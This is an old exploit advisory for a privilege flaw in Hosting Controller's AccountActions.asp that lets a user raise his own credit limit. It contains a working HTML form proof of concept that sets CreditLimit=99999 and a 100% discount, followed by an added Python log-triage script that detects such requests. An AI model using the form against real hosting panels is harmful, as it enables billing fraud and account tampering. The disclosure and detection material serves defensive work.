Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).
Title: The Hosting Controller program has a security bug in "AccountActions.asp" that lets an authenticated user change his/her credit and buy some services!

Version: 6.1 HotFix 2.1 and older
Developer url: hostingcontroller.com
Comment: Hosting Controller is an application to manage a host.

Exploit code as proof:
--------------------------------
GET CREDIT<br>Soroush Dalili from GSG<br>
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="UserName" value=""></td>
</tr>
<tr>
<td>Description:</td>
<td><input type="text" name="Description" value=""></td>
</tr>
<tr>
<td>FullName:</td>
<td><input type="text" name="FullName" value=""></td>
</tr>
<tr>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
</tr>
<tr>
<td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td>
</tr>
<tr>
<td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
</tr>
<tr>
<td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
</tr>
<tr>
<td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
# milw0rm.com [2005-07-10]
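
A log-triage heuristic for the request this form sends, as an added example that is not part of the original advisory: it scans IIS W3C extended logs for POSTs to AccountActions.asp with ActionType=UpdateCreditLimit whose Referer is missing or points to another host, which is what a form served from outside the panel produces. The logged field set, host names and sample lines are assumptions constructed for illustration; a hit is a lead for review, and the fix remains a server-side authorization check in the handler.

```python
from urllib.parse import parse_qs, urlsplit

# Path and ActionType value taken from the advisory's form action.
TARGET_STEM = "/admin/accounts/accountactions.asp"
TARGET_ACTION = "updatecreditlimit"

# Constructed sample log (documentation IPs and host names, not real data).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query cs-host cs(Referer) sc-status
2005-07-11 09:14:02 192.0.2.10 POST /Admin/Accounts/AccountActions.asp ActionType=UpdateCreditLimit panel.example.test http://panel.example.test/Admin/Accounts/ViewAccount.asp 200
2005-07-11 09:20:45 198.51.100.7 POST /admin/accounts/accountactions.asp ActionType=UpdateCreditLimit panel.example.test - 200
2005-07-11 09:21:10 198.51.100.7 GET /Admin/Accounts/AccountActions.asp ActionType=UpdateCreditLimit panel.example.test - 200
2005-07-11 09:30:00 203.0.113.5 POST /Admin/Accounts/AccountActions.asp actiontype=updatecreditlimit panel.example.test http://other.example.net/form.html 302
2005-07-11 09:31:00 192.0.2.10 POST /Admin/Accounts/AccountActions.asp ActionType=Other panel.example.test - 200
"""

def is_credit_update(row):
    """True for a POST to the advisory's endpoint with the credit-limit action."""
    if row.get("cs-method", "").upper() != "POST":
        return False
    if row.get("cs-uri-stem", "").lower() != TARGET_STEM:  # IIS paths are case-insensitive
        return False
    query = parse_qs(row.get("cs-uri-query", "").lower())
    return TARGET_ACTION in query.get("actiontype", [])

def referer_is_foreign(row):
    """True when the Referer is absent ("-") or names a host other than the site."""
    referer = row.get("cs(Referer)", "-")
    if referer == "-":
        return True
    ref_host = (urlsplit(referer).hostname or "").lower()
    site_host = row.get("cs-host", "").split(":")[0].lower()
    return ref_host != site_host

def suspicious_credit_updates(lines):
    """Return (date, time, client IP, referer) for each flagged log entry."""
    fields, hits = [], []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if is_credit_update(row) and referer_is_foreign(row):
            hits.append((row.get("date"), row.get("time"),
                         row.get("c-ip"), row.get("cs(Referer)")))
    return hits
```

Calling `suspicious_credit_updates(SAMPLE_LOG.splitlines())` flags the two off-site POSTs in the sample and leaves the in-panel POST, the GET and the unrelated action alone.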